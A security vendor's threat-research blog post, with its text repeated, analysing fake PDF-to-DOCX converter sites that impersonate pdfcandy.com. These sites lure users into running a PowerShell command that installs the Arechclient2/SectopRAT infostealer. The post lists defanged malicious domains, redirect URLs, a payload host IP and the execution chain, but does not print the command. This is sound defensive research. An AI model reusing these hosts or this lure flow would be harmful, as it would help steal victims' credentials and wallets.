🚀 CloudSEK has raised $19M Series B1 Round – Powering the Future of Predictive Cybersecurity
Read More
What looks like a harmless online file conversion could be a trap set by cybercriminals. CloudSEK’s latest investigation uncovers a stealthy malware campaign where fake PDF-to-DOCX converters, mimicking the popular PDFCandy.com, trick users into running malicious PowerShell commands. The endgame? A powerful information stealer that hijacks browser credentials, crypto wallets, and more. Dive into our detailed breakdown of this social engineering scam, its technical anatomy, and how to stay a step ahead of such byte bandits.
Identify and counter malicious links and phishing attempts effectively with CloudSEK XVigil Fake URLs and Phishing module, bolstering your defense against cyber threats
Schedule a DemoOnline PDF converters have become essential tools in daily digital workflows. On March 17, 2025, the FBI's Denver field office issued an alert regarding malicious online file converters being used to distribute malware. This prompted CloudSEK's Security Research team to conduct an in-depth investigation into these threats to understand their mechanisms and develop protective measures.
This report examines a sophisticated attack involving a malicious PDF-to-DOCX converter that impersonates the legitimate service pdfcandy.com. The threat actors meticulously replicated the user interface of the genuine platform and registered similar-looking domain names to deceive users. The attack vector involves tricking victims into executing a PowerShell command that installs Arechclient2 malware, a variant of the dangerous SectopRAT information stealer family known for harvesting sensitive data from compromised systems.
Our analysis details the technical aspects of this attack, the indicators of compromise, and provides actionable recommendations to help organizations and individuals protect themselves against such sophisticated social engineering tactics.
Figures 2 and 3 showcase the landing and home pages of two identified malicious file conversion websites, both expertly impersonating the legitimate pdfcandy.com service. These fraudulent sites meticulously replicate pdfcandy.com's visual identity, including its logo and brand elements, creating a convincing facade. Upon arrival, users are immediately prompted to upload a PDF file for conversion to Word (.docx) format, exploiting a common file conversion need to initiate the attack vector.
Upon initiating the PDF conversion process, the malicious website employs a series of sophisticated social engineering tactics to manipulate user behavior:
This carefully crafted user flow demonstrates the attackers' understanding of human psychology and web design conventions, highlighting the sophisticated nature of this social engineering attack.
Following the deceptive CAPTCHA interaction, the website prompts users to execute a PowerShell command (shown below) with detailed instructions as illustrated in Figure 5—a critical point where social engineering transitions to system compromise.
Upon decoding the command, we discovered a sophisticated redirection chain designed to obscure the malware delivery process. The initial connection targets "bind-new-connect[.]click/santa/bee" disguised as a seemingly innocuous "https[://]bitly[.]cx[/]SMma" shortened URL. This redirect, shown in Figure 6, subsequently forwards to "https[://]bitly[.]cx[/]Www0" which then chains to "bind-new-connect[.]click/marmaris/later" - the actual endpoint serving the malicious "adobe.zip" payload. As per ThreatFox, the domain "bind-new-connect[.]click” is a known distributor of the ArechClient malware belonging to the SectopRAT family of information stealers. This sophisticated .NET-based Remote Access Trojan has been active since 2019 and possesses extensive capabilities for stealing sensitive data, including browser credentials and cryptocurrency wallet information.
The malicious "adobe.zip" file was hosted on IP address 172[.]86[.]115[.]43, which has been flagged as malicious by multiple security vendors according to VirusTotal analysis. SectopRAT typically employs various distribution methods, including malvertising through Google Ads and fake application updates, to maximize infection rates.
The contents of the “adobe.zip” can be seen in Figure 7 above. This archive expands to a folder named “SoundBAND” and contains a malicious executable file “audiobit[.]exe”. The full malware analysis of this entire archive can be found in this ANY.RUN sandbox report.
The execution of "audiobit[.]exe" triggers a sophisticated multi-stage attack chain where "cmd[.]exe" is spawned, which subsequently launches "MSBuild[.]exe"—a legitimate Windows utility now weaponized to load and execute the ArechClient2 information stealer, as illustrated in Figure 9 below.
To protect against malicious file converters like the one analyzed in this report, organizations and individuals should:
Take action now
CloudSEK Platform is a no-code platform that powers our products with predictive threat analytic capabilities.
Digital Risk Protection platform which gives Initial Attack Vector Protection for employees and customers.
Software and Supply chain Monitoring providing Initial Attack Vector Protection for Software Supply Chain risks.
Creates a blueprint of an organization's external attack surface including the core infrastructure and the software components.
Instant Security Score for any Android Mobile App on your phone. Search for any app to get an instant risk score.
5
min read
What looks like a harmless online file conversion could be a trap set by cybercriminals. CloudSEK’s latest investigation uncovers a stealthy malware campaign where fake PDF-to-DOCX converters, mimicking the popular PDFCandy.com, trick users into running malicious PowerShell commands. The endgame? A powerful information stealer that hijacks browser credentials, crypto wallets, and more. Dive into our detailed breakdown of this social engineering scam, its technical anatomy, and how to stay a step ahead of such byte bandits.
Online PDF converters have become essential tools in daily digital workflows. On March 17, 2025, the FBI's Denver field office issued an alert regarding malicious online file converters being used to distribute malware. This prompted CloudSEK's Security Research team to conduct an in-depth investigation into these threats to understand their mechanisms and develop protective measures.
This report examines a sophisticated attack involving a malicious PDF-to-DOCX converter that impersonates the legitimate service pdfcandy.com. The threat actors meticulously replicated the user interface of the genuine platform and registered similar-looking domain names to deceive users. The attack vector involves tricking victims into executing a PowerShell command that installs Arechclient2 malware, a variant of the dangerous SectopRAT information stealer family known for harvesting sensitive data from compromised systems.
Our analysis details the technical aspects of this attack, the indicators of compromise, and provides actionable recommendations to help organizations and individuals protect themselves against such sophisticated social engineering tactics.
Figures 2 and 3 showcase the landing and home pages of two identified malicious file conversion websites, both expertly impersonating the legitimate pdfcandy.com service. These fraudulent sites meticulously replicate pdfcandy.com's visual identity, including its logo and brand elements, creating a convincing facade. Upon arrival, users are immediately prompted to upload a PDF file for conversion to Word (.docx) format, exploiting a common file conversion need to initiate the attack vector.
Upon initiating the PDF conversion process, the malicious website employs a series of sophisticated social engineering tactics to manipulate user behavior:
This carefully crafted user flow demonstrates the attackers' understanding of human psychology and web design conventions, highlighting the sophisticated nature of this social engineering attack.
Following the deceptive CAPTCHA interaction, the website prompts users to execute a PowerShell command (shown below) with detailed instructions as illustrated in Figure 5—a critical point where social engineering transitions to system compromise.
Upon decoding the command, we discovered a sophisticated redirection chain designed to obscure the malware delivery process. The initial connection targets "bind-new-connect[.]click/santa/bee" disguised as a seemingly innocuous "https[://]bitly[.]cx[/]SMma" shortened URL. This redirect, shown in Figure 6, subsequently forwards to "https[://]bitly[.]cx[/]Www0" which then chains to "bind-new-connect[.]click/marmaris/later" - the actual endpoint serving the malicious "adobe.zip" payload. As per ThreatFox, the domain "bind-new-connect[.]click” is a known distributor of the ArechClient malware belonging to the SectopRAT family of information stealers. This sophisticated .NET-based Remote Access Trojan has been active since 2019 and possesses extensive capabilities for stealing sensitive data, including browser credentials and cryptocurrency wallet information.
The malicious "adobe.zip" file was hosted on IP address 172[.]86[.]115[.]43, which has been flagged as malicious by multiple security vendors according to VirusTotal analysis. SectopRAT typically employs various distribution methods, including malvertising through Google Ads and fake application updates, to maximize infection rates.
The contents of the “adobe.zip” can be seen in Figure 7 above. This archive expands to a folder named “SoundBAND” and contains a malicious executable file “audiobit[.]exe”. The full malware analysis of this entire archive can be found in this ANY.RUN sandbox report.
The execution of "audiobit[.]exe" triggers a sophisticated multi-stage attack chain where "cmd[.]exe" is spawned, which subsequently launches "MSBuild[.]exe"—a legitimate Windows utility now weaponized to load and execute the ArechClient2 information stealer, as illustrated in Figure 9 below.
To protect against malicious file converters like the one analyzed in this report, organizations and individuals should: